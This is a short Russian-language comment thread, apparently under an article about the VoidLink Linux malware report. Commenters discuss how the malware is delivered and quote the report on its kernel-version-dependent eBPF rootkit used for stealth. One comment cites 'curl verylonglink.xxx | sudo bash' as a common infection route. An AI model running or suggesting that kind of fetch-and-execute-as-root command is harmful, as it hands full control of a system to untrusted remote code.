Pull to refresh

Comments 5

А как происходит заражение ? Как вредонос попадает на хост ?

Отчёт сосредоточен на post-exploitation, однако механизм первоначальной доставки бинарного файла не раскрыт. Упоминается только наличие многоступенчатой цепочки заражения.

Сейчас так модно:

curl verylonglink.xxx | sudo bash

А как именно используется eBPF?

Согласно отчету, в VoidLink eBPF применяется как один из трёх вариантов руткит-технологий на уровне ядра для обеспечения максимальной скрытности. Это не основной, а условный механизм, который выбирается автоматически в зависимости от версии ядра и возможностей системы.

Условия выбора и развертывания eBPF (прямая цитата из отчёта):

«eBPF: For a Kernel version ≥ 5.5 with eBPF support»

«It couples them with eBPF programs that can hook sensitive paths without requiring a traditional LKM on newer, locked-down systems.»

«VoidLink handles rootkit deployment once again, based on the environment in which it runs, and chooses the right rootkit to deploy accordingly.»

Sign up to leave a comment.

Other news